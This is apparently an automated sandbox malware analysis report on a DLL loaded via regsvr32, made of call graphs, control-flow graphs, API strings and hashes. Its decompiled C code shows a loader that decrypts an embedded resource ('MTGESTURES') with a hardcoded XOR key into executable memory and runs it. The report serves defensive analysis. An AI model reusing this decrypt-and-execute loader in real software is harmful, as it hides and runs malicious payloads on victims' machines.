39985->39987 39987->39961 39999 180038574 EnterCriticalSection 39988->39999 39990 18003936c 39991 180047a0c 62 API calls 39990->39991 39992 180039375 39991->39992 39993 1800393f4 64 API calls 39992->39993 39998 180039383 39992->39998 39996 18003937e 39993->39996 39994 180038590 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 39995 18003938f 39994->39995 39995->39984 39997 1800394e4 GetStdHandle GetFileType 39996->39997 39997->39998 39998->39994 40001 1800056ae 40000->40001 40012 18003c1f4 40001->40012 40006 18003c1f4 _set_error_mode 11 API calls 40008 1800056f7 40006->40008 40009 18003a674 Concurrency::details::_Concurrent_queue_iterator_base_v4::~_Concurrent_queue_iterator_base_v4 11 API calls 40008->40009 40010 180005705 40009->40010 40011 18000570e 40010->40011 40025 180036f34 6 API calls __crtLCMapStringW 40010->40025 40011->39964 40017 18003c205 _set_error_mode 40012->40017 40013 18003c256 40027 18003bffc 11 API calls _set_error_mode 40013->40027 40014 18003c23a RtlAllocateHeap 40015 1800056cd 40014->40015 40014->40017 40019 18003a674 40015->40019 40017->40013 40017->40014 40026 18003add4 EnterCriticalSection LeaveCriticalSection _set_error_mode 40017->40026 40020 18003a679 RtlDeleteBoundaryDescriptor 40019->40020 40021 1800056db 40019->40021 40020->40021 40022 18003a694 GetLastError 40020->40022 40021->40006 40021->40010 40023 18003a6a1 Concurrency::details::_Concurrent_queue_iterator_base_v4::~_Concurrent_queue_iterator_base_v4 40022->40023 40028 18003bffc 11 API calls _set_error_mode 40023->40028 40025->40010 40026->40017 40027->40015 40028->40021 40036 18002dd3c 40029->40036 40032 1800054ec 40049 1800387f8 GetLastError 40032->40049 40034 180003352 40034->39970 40035 180004a7c 7 API calls __vcrt_freeptd 40034->40035 40035->39970 40037 180003345 40036->40037 40038 18002dd5b GetLastError 40036->40038 40037->39970 40037->40032 40048 180046770 6 API calls __vcrt_InitializeCriticalSectionEx 40038->40048 40050 180038839 FlsSetValue 40049->40050 40051 18003881c 40049->40051 40052 18003884b 40050->40052 40056 180038829 40050->40056 40051->40050 40051->40056 40054 18003c1f4 _set_error_mode 5 API calls 40052->40054 40053 1800388a5 SetLastError 40053->40034 40055 18003885a 40054->40055 40057 180038878 FlsSetValue 40055->40057 40058 180038868 FlsSetValue 40055->40058 40056->40053 40060 180038884 FlsSetValue 40057->40060 40061 180038896 40057->40061 40059 180038871 40058->40059 40062 18003a674 Concurrency::details::_Concurrent_queue_iterator_base_v4::~_Concurrent_queue_iterator_base_v4 5 API calls 40059->40062 40060->40059 40066 180038bac 11 API calls _set_error_mode 40061->40066 40062->40056 40064 18003889e 40065 18003a674 Concurrency::details::_Concurrent_queue_iterator_base_v4::~_Concurrent_queue_iterator_base_v4 5 API calls 40064->40065 40065->40053 40066->40064 40068 18002af94 40067->40068 40079 18002b878 40068->40079 40072 18002afe8 40073 180001ce8 40072->40073 40101 180006df0 61 API calls 2 library calls 40072->40101 40073->39939 40073->39940 40075->39947 40076->39949 40077->39954 40078->39936 40080 18002b8bb 40079->40080 40081 18002b8a9 40079->40081 40083 18002b905 40080->40083 40086 18002b8c8 40080->40086 40102 18003bffc 11 API calls _set_error_mode 40081->40102 40084 18002b920 40083->40084 40105 180006e80 61 API calls 2 library calls 40083->40105 40091 18002b942 40084->40091 40106 18002a934 64 API calls UnDecorator::getSymbolName 40084->40106 40085 18002b8ae 40103 18003a794 61 API calls _invalid_parameter_noinfo_noreturn 40085->40103 40104 18003aa20 39 API calls _invalid_parameter_noinfo_noreturn 40086->40104 40092 18002b9e0 40091->40092 40107 18003bffc 11 API calls _set_error_mode 40091->40107 40095 18002afc3 40092->40095 40109 18003bffc 11 API calls _set_error_mode 40092->40109 40095->40072 40100 180006df0 61 API calls 2 library calls 40095->40100 40096 18002b9d5 40108 18003a794 61 API calls _invalid_parameter_noinfo_noreturn 40096->40108 40097 18002ba8d 40110 18003a794 61 API calls _invalid_parameter_noinfo_noreturn 40097->40110 40100->40072 40101->40073 40102->40085 40103->40095 40104->40095 40105->40084 40106->40084 40107->40096 40108->40092 40109->40097 40110->40095

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 2800000-2800460 call 2800aa8 * 2 VirtualAlloc 22 2800462-2800466 0->22 23 280048a-2800494 0->23 24 2800468-2800488 22->24 26 2800a91-2800aa6 23->26 27 280049a-280049e 23->27 24->23 24->24 27->26 28 28004a4-28004a8 27->28 28->26 29 28004ae-28004b2 28->29 29->26 30 28004b8-28004bf 29->30 30->26 31 28004c5-28004d2 30->31 31->26 32 28004d8-28004e1 31->32 32->26 33 28004e7-28004f4 32->33 33->26 34 28004fa-2800507 33->34 35 2800531-2800567 GetNativeSystemInfo 34->35 36 2800509-2800511 34->36 35->26 38 280056d-2800589 VirtualAlloc 35->38 37 2800513-2800518 36->37 39 2800521 37->39 40 280051a-280051f 37->40 41 28005a0-28005ac 38->41 42 280058b-280059e VirtualAlloc 38->42 43 2800523-280052f 39->43 40->43 44 28005af-28005b2 41->44 42->41 43->35 43->37 45 28005c1-28005db 44->45 46 28005b4-28005bf 44->46 47 280061b-2800622 45->47 48 28005dd-28005e2 45->48 46->44 49 2800628-280062f 47->49 50 28006db-28006e2 47->50 51 28005e4-28005ea 48->51 49->50 52 2800635-2800642 49->52 53 2800864-280086b 50->53 54 28006e8-28006f9 50->54 55 280060b-2800619 51->55 56 28005ec-2800609 51->56 52->50 59 2800648-280064f 52->59 57 2800871-280087f 53->57 58 2800917-2800929 53->58 60 2800702-2800705 54->60 55->47 55->51 56->55 56->56 63 280090e-2800911 57->63 61 2800a07-2800a1a 58->61 62 280092f-2800937 58->62 64 2800654-2800658 59->64 65 2800707-280070a 60->65 66 28006fb-28006ff 60->66 87 2800a40-2800a4a 61->87 88 2800a1c-2800a27 61->88 67 280093b-280093f 62->67 63->58 71 2800884-28008a9 63->71 68 28006c0-28006ca 64->68 69 2800788-280078e 65->69 70 280070c-280071d 65->70 66->60 72 2800945-280095a 67->72 73 28009ec-28009fa 67->73 77 280065a-2800669 68->77 78 28006cc-28006d2 68->78 74 2800794-28007a2 69->74 70->74 75 280071f-2800720 70->75 93 2800907-280090c 71->93 94 28008ab-28008b1 71->94 80 280097b-280097d 72->80 81 280095c-280095e 72->81 73->67 83 2800a00-2800a01 73->83 89 28007a8 74->89 90 280085d-280085e 74->90 86 2800722-2800784 75->86 84 280067a-280067e 77->84 85 280066b-2800678 77->85 78->64 79 28006d4-28006d5 78->79 79->50 96 28009a2-28009a4 80->96 97 280097f-2800981 80->97 91 2800960-280096c 81->91 92 280096e-2800979 81->92 83->61 98 2800680-280068a 84->98 99 280068c-2800690 84->99 95 28006bd-28006be 85->95 86->86 100 2800786 86->100 103 2800a7b-2800a8e 87->103 104 2800a4c-2800a54 87->104 101 2800a38-2800a3e 88->101 102 28007ae-28007d4 89->102 90->53 106 28009be-28009bf 91->106 92->106 93->63 114 28008b3-28008b9 94->114 115 28008bb-28008c8 94->115 95->68 112 28009a6-28009aa 96->112 113 28009ac-28009bb 96->113 107 2800983-2800987 97->107 108 2800989-280098b 97->108 109 28006b6-28006ba 98->109 110 2800692-28006a3 99->110 111 28006a5-28006a9 99->111 100->74 101->87 116 2800a29-2800a35 101->116 125 2800835-2800839 102->125 126 28007d6-28007d9 102->126 103->26 104->103 105 2800a56-2800a79 RtlAddFunctionTable 104->105 105->103 120 28009c5-28009cb 106->120 107->106 108->96 118 280098d-280098f 108->118 109->95 110->109 111->95 119 28006ab-28006b3 111->119 112->106 113->106 121 28008ea-28008fe 114->121 122 28008d3-28008e5 115->122 123 28008ca-28008d1 115->123 116->101 127 2800991-2800997 118->127 128 2800999-28009a0 118->128 119->109 129 28009d9-28009e9 VirtualProtect 120->129 130 28009cd-28009d3 120->130 121->93 141 2800900-2800905 121->141 122->121 123->122 123->123 134 2800844-2800850 125->134 135 280083b 125->135 132 28007e3-28007f0 126->132 133 28007db-28007e1 126->133 127->106 128->120 129->73 130->129 138 28007f2-28007f9 132->138 139 28007fb-280080d 132->139 137 2800812-280082c 133->137 134->102 140 2800856-2800857 134->140 135->134 137->125 143 280082e-2800833 137->143 138->138 138->139 139->137 140->90 141->94 143->126
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452425564.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2800000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                      • API String ID: 394283112-2517549848
                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction ID: c2f9a53a893d5576f3af23baae53ad3a8b1147603255d085062a384dca696153
                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction Fuzzy Hash: FE72C338618B488BDB69DF18CC857B9B7E1FB98305F10462DE88ED7251DB34E542CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$+i$UJ:^$U|$Vmb$Z1q$I2
                                                                      • API String ID: 0-3061708152
                                                                      • Opcode ID: 4aa6fb7ee240bc485f0592f21fad5cc20e57c46df479ad70c636c3d1271d35b6
                                                                      • Instruction ID: d1cb0a0140c73a4dc90d741ce8f2c18c9dce68820ec564a948d8cd2858bee239
                                                                      • Opcode Fuzzy Hash: 4aa6fb7ee240bc485f0592f21fad5cc20e57c46df479ad70c636c3d1271d35b6
                                                                      • Instruction Fuzzy Hash: FC72F57451078E8BCB48DF28C89A4DE3FA1FB68388B51521DFC4A9A260C778D995CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 348 285061c-285063b 349 2850642 348->349 350 2850647-285064d 349->350 351 2850653-2850655 350->351 352 2850a48-2850b76 call 285606c * 2 350->352 353 2850981-2850a2d call 285cef8 351->353 354 285065b-2850661 351->354 374 2850b7b 352->374 367 2850a2f-2850a39 353->367 368 2850a3e-2850a43 353->368 356 2850667-285066d 354->356 357 2850839-2850907 call 28436d0 call 2850f00 354->357 360 28506c5-2850834 call 2859de4 * 2 356->360 361 285066f-2850675 356->361 379 285090c-285097c call 285a778 357->379 360->349 365 2850b80-2850b86 361->365 366 285067b-28506b5 call 2856b64 361->366 375 2850b8c 365->375 376 28506ba-28506c4 365->376 366->376 367->349 368->349 374->365 375->350 379->374
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V)$"]$"]$7{|$P$eO^O$qk]
                                                                      • API String ID: 0-2225954037
                                                                      • Opcode ID: 79a60d715acddf0f902cc94a6a4fab14865328c037893e38a8d1218b4829f0de
                                                                      • Instruction ID: 059ef7a3589d0b541fffb5911c03a417b33a230bad67e4a82c2f5ed77e73c702
                                                                      • Opcode Fuzzy Hash: 79a60d715acddf0f902cc94a6a4fab14865328c037893e38a8d1218b4829f0de
                                                                      • Instruction Fuzzy Hash: 34F1D2755107489FCB98DF28C8899DD3FE1FB483A8F952219FD0AAB250D774D884CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 405 2844fec-284501e 406 2845020-2845025 405->406 407 2845201-2845280 call 285a6d4 406->407 408 284502b-2845030 406->408 415 2845285-284528b 407->415 409 2845036-284503b 408->409 410 2845169-28451fc call 284f300 408->410 412 28450d0-2845159 call 2859de4 409->412 413 2845041-2845046 409->413 410->406 424 284534d-284535f 412->424 428 284515f-2845164 412->428 418 2845342-2845347 413->418 419 284504c-28450cb call 2860028 413->419 416 284528d-2845294 415->416 417 284529a-284533d call 2845a7c 415->417 416->417 417->418 418->406 418->424 419->406 428->406
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !dA$=R$O=Q$Xu$xZo
                                                                      • API String ID: 0-1460049892
                                                                      • Opcode ID: c7db5d378d103f2bd2ae6ee105205189115723db2cb894335de555d0ca505e0c
                                                                      • Instruction ID: f90d1a2e0f647c9af076e5023f5e01b754188ce1e7134258e0647580ed9e6a25
                                                                      • Opcode Fuzzy Hash: c7db5d378d103f2bd2ae6ee105205189115723db2cb894335de555d0ca505e0c
                                                                      • Instruction Fuzzy Hash: C691057451038D8BCF88DF24D88A4DE3FA0FB1839CF551219FC4AA6260D7B8D995CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 429 2860358-2860384 430 2860389 429->430 431 286038b-2860391 430->431 432 2860397-286039d 431->432 433 2860a01 431->433 435 28603a3-28603a9 432->435 436 28606e8-28608a2 call 285ab24 call 285fdb0 432->436 434 2860a06-2860a0c 433->434 434->431 437 2860a12-2860a1f 434->437 435->434 439 28603af-28603b8 435->439 447 28608a4 436->447 448 28608a9-28609fa call 285fdb0 call 2856eb8 436->448 441 28603f1-286041b 439->441 442 28603ba-28603ef 439->442 444 2860425-28606c4 call 285db98 call 285fdb0 call 2856eb8 441->444 442->444 456 28606c9-28606d3 444->456 447->448 448->437 459 28609fc 448->459 456->437 458 28606d9-28606e3 456->458 458->431 459->430
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;`eq$\$`T=a$hoK
                                                                      • API String ID: 0-3884313853
                                                                      • Opcode ID: f1025b0e62348144597603c9a31ae475b452d39bf13fe170309feb3744dcdff1
                                                                      • Instruction ID: 21b7e64cc84834b6419de40e5dce6331dca2cb1e7e20a042f7d211000a5be98a
                                                                      • Opcode Fuzzy Hash: f1025b0e62348144597603c9a31ae475b452d39bf13fe170309feb3744dcdff1
                                                                      • Instruction Fuzzy Hash: 3CF106755053C8CBEBBADFA4D889BD97BA9FB44B48F10111AE84AEE250CBB05744CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 460 28629a0-2862a34 call 2841a70 463 2862a37-2862a3d 460->463 464 2862a43 463->464 465 2862c3c-2862c42 463->465 466 2862bcf-2862c32 call 284e010 464->466 467 2862a49-2862a4f 464->467 468 2862f45-28630e2 call 28601ac 465->468 469 2862c48-2862c4e 465->469 466->465 470 2862a55-2862a5b 467->470 471 2862b33-2862bca call 2859de4 467->471 487 286316c 468->487 488 28630e8-2863167 call 2842a84 468->488 473 2862c54-2862c5a 469->473 474 2862ec1-2862f35 call 2859de4 469->474 477 2862a61-2862a67 470->477 478 2862b19-2862b2e 470->478 503 2862b08-2862b14 471->503 480 2862c60-2862c66 473->480 481 2862e2c-2862ebc call 285606c 473->481 493 2863235-2863255 474->493 494 2862f3b-2862f40 474->494 485 2862a88-2862aef call 2861b90 477->485 486 2862a69-2862a6f 477->486 478->463 489 2862c6c-2862e27 call 2864fa4 call 2845a7c 480->489 490 286317d-2863183 480->490 481->503 506 2862af4-2862b02 485->506 495 2862a75-2862a7b 486->495 496 286318e-2863230 call 285606c 486->496 500 2863171-286317a 487->500 488->503 489->500 490->493 501 2863189 490->501 494->503 495->490 504 2862a81-2862a86 495->504 496->493 500->490 501->463 503->463 504->463 506->503
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 3zE*$_&9B$hd
                                                                      • API String ID: 0-4287047232
                                                                      • Opcode ID: e5d0ce55f33007157258e2bca1b3cb10ced209abe0a2d895aadc9d5307cbcf4f
                                                                      • Instruction ID: 9e00a463eca1a48e4a49e2f54dc80363fc0c66601f8bd868504b8cc6197d2e16
                                                                      • Opcode Fuzzy Hash: e5d0ce55f33007157258e2bca1b3cb10ced209abe0a2d895aadc9d5307cbcf4f
                                                                      • Instruction Fuzzy Hash: F0420575A0470D8FCB58CFA8C49A9EEBBF2FB58348F004119D846B7250DBB45A19CF99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 511 285ba54-285baa0 call 2841a70 514 285baa5-285baaa 511->514 515 285bd74-285bd79 514->515 516 285bab0-285bab2 514->516 519 285bd7e-285bd83 515->519 517 285bab8-285babd 516->517 518 285bd8a-285bdf1 call 2856c0c 516->518 520 285bac3-285bac8 517->520 521 285bc9d-285bd6a call 2864494 517->521 523 285bdf6-285be0e 518->523 522 285bd85 519->522 519->523 526 285bbc5-285bc81 call 284aca0 520->526 527 285bace-285bad3 520->527 528 285bd6f Process32FirstW 521->528 522->514 534 285bc86-285bc8d 526->534 529 285bbac-285bbc3 call 284ad48 527->529 530 285bad9-285bade 527->530 528->515 539 285bba5-285bba7 529->539 530->519 532 285bae4-285bb97 call 284cd94 530->532 538 285bb9c-285bba0 532->538 534->523 537 285bc93-285bc98 534->537 537->514 538->539 539->514
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0pK.$^y7$eV+
                                                                      • API String ID: 0-3489520402
                                                                      • Opcode ID: 1b84582fcdad8df5f8969530d6f01cd6caf3a94846c7537c0908e8d2d8809c0c
                                                                      • Instruction ID: 7d369582c96d3e6efe962a2242d12003446320f5821c2e0b58a3a3affa00515a
                                                                      • Opcode Fuzzy Hash: 1b84582fcdad8df5f8969530d6f01cd6caf3a94846c7537c0908e8d2d8809c0c
                                                                      • Instruction Fuzzy Hash: 72915F751297489FC7A8CF28C5D959EBBE1FB94704F801A1DF88ACB264C778DA04CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 540 2841a84-2841b88 call 2841a70 call 28432b8 545 2841c94-2841cab 540->545 546 2841b8e-2841c34 call 2854870 540->546 548 2841c39-2841c8f call 2856c0c 546->548 548->545
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$"?$EE
                                                                      • API String ID: 0-791827889
                                                                      • Opcode ID: 5b5d92e4004869ed3bdd002a44004d476a9f56380e8dcdb3ac450419ffc526ec
                                                                      • Instruction ID: dc706423ab9718d14008f81fc658acfe74f0b8330054dd0d170535befdeeece1
                                                                      • Opcode Fuzzy Hash: 5b5d92e4004869ed3bdd002a44004d476a9f56380e8dcdb3ac450419ffc526ec
                                                                      • Instruction Fuzzy Hash: 4A6106B490471A8FCF48DFA8C48A4AEBBB1FB58344F50461DE916A7360D7B49A95CFC0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &f$0`l
                                                                      • API String ID: 0-1552375368
                                                                      • Opcode ID: 06de78904f6e2f82479a58f3515caa77eed87aecee74a850838ef3f6b76d6e1a
                                                                      • Instruction ID: 6553a5e9787a383fa88a1e96d6af764135d81b0bd46c91ea431bb2234873ba43
                                                                      • Opcode Fuzzy Hash: 06de78904f6e2f82479a58f3515caa77eed87aecee74a850838ef3f6b76d6e1a
                                                                      • Instruction Fuzzy Hash: 4991E175129784ABC3C9DF28C58A95BBBE1FBC4754F802A1DF8C686260D7B0D949CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;8$^^d
                                                                      • API String ID: 0-1773882306
                                                                      • Opcode ID: b45cbffec5975b215113dea3963fb8f88eebc24e47608a1608c2df9029c30079
                                                                      • Instruction ID: 75c98ffc125add92be4df551f45ec22d4d3cb390f2b9275066d7c78a932073d6
                                                                      • Opcode Fuzzy Hash: b45cbffec5975b215113dea3963fb8f88eebc24e47608a1608c2df9029c30079
                                                                      • Instruction Fuzzy Hash: CF5109750083889FC7B8DF28C8895CEBBF1FB95708F50491DE9898B254DF729A48DB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: O.$Zc
                                                                      • API String ID: 0-508339902
                                                                      • Opcode ID: 4c7b222e2453f381ff03fcaa2b5abd6e3d05ff3bb60f6856e94c3d2700fedb7e
                                                                      • Instruction ID: 8752d0ccf5b7607518bed07ff08121ed7dd0eb2aab7b1dbdc46bd9405510914b
                                                                      • Opcode Fuzzy Hash: 4c7b222e2453f381ff03fcaa2b5abd6e3d05ff3bb60f6856e94c3d2700fedb7e
                                                                      • Instruction Fuzzy Hash: 9831BFB0508B848BE728CF29C48640ABFF1BBC5348F604A1DE6A68A374D770D845CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: cr5
                                                                      • API String ID: 0-4268389180
                                                                      • Opcode ID: 5009bb956abc8c03cd7f63aa78325b982ce863b4632f53aa7715abde9e74e3e4
                                                                      • Instruction ID: 6d5bcab105b9a82691d0f602254320cea966eedbb95c9be3fcc89b744bff69a0
                                                                      • Opcode Fuzzy Hash: 5009bb956abc8c03cd7f63aa78325b982ce863b4632f53aa7715abde9e74e3e4
                                                                      • Instruction Fuzzy Hash: 8E31CF75529380ABC7C8DF28C58A91BBBF1FBC4704F806A1DF8969A260D774D9188F43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 22%
                                                                      			E00000001180001C40(intOrPtr __edx, long long __rcx, long long __r8) {
                                                                      				signed int _v8;
                                                                      				void* _v2984;
                                                                      				void* _v3016;
                                                                      				char _v3032;
                                                                      				long _v3036;
                                                                      				long long _v3048;
                                                                      				intOrPtr _v3052;
                                                                      				long long _v3064;
                                                                      				long long _v3072;
                                                                      				long long _v3080;
                                                                      				int* _v3088;
                                                                      				intOrPtr _v3092;
                                                                      				void* _v3104;
                                                                      				long long _v3112;
                                                                      				long long _v3120;
                                                                      				int* _v3128;
                                                                      				signed int _v3132;
                                                                      				intOrPtr _v3136;
                                                                      				signed int _v3140;
                                                                      				long _v3144;
                                                                      				intOrPtr _t72;
                                                                      				void* _t78;
                                                                      				int _t81;
                                                                      				void* _t85;
                                                                      				long _t104;
                                                                      				intOrPtr _t121;
                                                                      				signed long long _t131;
                                                                      				long long _t133;
                                                                      				int* _t141;
                                                                      				void* _t147;
                                                                      				intOrPtr _t157;
                                                                      				void* _t172;
                                                                      				signed long long _t173;
                                                                      				void* _t178;
                                                                      
                                                                      				_t131 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v8 = _t131 ^ _t173;
                                                                      				_v3048 = __r8;
                                                                      				_v3052 = __edx;
                                                                      				_v3064 = __rcx;
                                                                      				_t72 = _v3052;
                                                                      				_v3136 = _t72;
                                                                      				_t121 = _t72;
                                                                      				if (_t121 == 0) goto 0x80001f96;
                                                                      				goto 0x80001c7f;
                                                                      				if (_t121 == 0) goto 0x80001ca6;
                                                                      				goto 0x80001c91;
                                                                      				if (_t121 < 0) goto 0x80001f96;
                                                                      				goto 0x80001f9b;
                                                                      				_v3072 = 0;
                                                                      				_t133 = _v3064;
                                                                      				_v3080 = _t133;
                                                                      				_v3088 = 0;
                                                                      				r8d = 0xb9d;
                                                                      				E00000001180004B10();
                                                                      				_t78 = E0000000118002AF64(_t133, _t147, "576688993", _t172);
                                                                      				_v3092 = 0x225f9efe;
                                                                      				if (_v3072 != 0) goto 0x80001f8c;
                                                                      				r9d = 0x64;
                                                                      				LoadStringW(??, ??, ??, ??);
                                                                      				r9d = 0x64;
                                                                      				_t81 = LoadStringW(??, ??, ??, ??);
                                                                      				0x8002d3c0(); // executed
                                                                      				_v3104 = _t133 - _t78;
                                                                      				if (_v3104 != 0) goto 0x80001d68;
                                                                      				_v3036 = 0;
                                                                      				goto 0x80001fa6;
                                                                      				_v3112 = 0x5f5e164;
                                                                      				_v3120 = 0;
                                                                      				_v3128 = _v3104;
                                                                      				if (_v3120 - 0x5f5e164 >= 0) goto 0x80001dc2;
                                                                      				 *_v3128 = _t81;
                                                                      				_v3120 = _v3120 + 1;
                                                                      				_t141 =  &(_v3128[0]);
                                                                      				_v3128 = _t141;
                                                                      				goto 0x80001d84;
                                                                      				E0000000118002D3AC(_t81, _v3120 - 0x5f5e164, _t141, _v3104, 0x8005e0f0, _t172); // executed
                                                                      				r8d = E0000000118002AF64(_t141, _t147, "8192", _t172);
                                                                      				r8d = r8d | 0x00001000;
                                                                      				r9d = 0x40; // executed
                                                                      				_t85 = VirtualAlloc(??, ??, ??, ??); // executed
                                                                      				_v3088 = _t141;
                                                                      				r8d = 0x30;
                                                                      				E000000011800051C0(_t85, 0, 0x80072e38, _v3092, L"MTGESTURES");
                                                                      				 *0x80072e40 = "^hTE8uMufYPTb7P$Q";
                                                                      				 *0x80072e48 = 0x12;
                                                                      				 *0x80072e38 = _v3064;
                                                                      				 *0x80072e50 = 0x1e09;
                                                                      				 *0x80072e58 = 0x17;
                                                                      				_v3132 = 0;
                                                                      				if (_v3132 - _v3092 >= 0) goto 0x80001eb3;
                                                                      				_v3140 =  *(_t173 + _v3132 + 0xc0) & 0x000000ff;
                                                                      				_t157 =  *0x80072e40; // 0x18006633f
                                                                      				r8d = 0x12;
                                                                      				asm("cdq");
                                                                      				 *((char*)(_v3088 + _v3132)) = _v3140 ^  *(_t157 + _v3132 % r8d) & 0x000000ff;
                                                                      				_v3132 = _v3132 + 1;
                                                                      				goto 0x80001e53;
                                                                      				_v3088();
                                                                      				if ( *0x80072e60 != 0) goto 0x80001f87;
                                                                      				E00000001180001FD0(_v3080);
                                                                      				if (E000000011800020A0(_v3052, _v3080) != 0) goto 0x80001efd;
                                                                      				_v3036 = 0;
                                                                      				goto 0x80001fa6;
                                                                      				goto 0x80001f02;
                                                                      				r9d = 0;
                                                                      				r8d = r9d;
                                                                      				if (GetMessageW(??, ??, ??, ??) == 0) goto 0x80001f73;
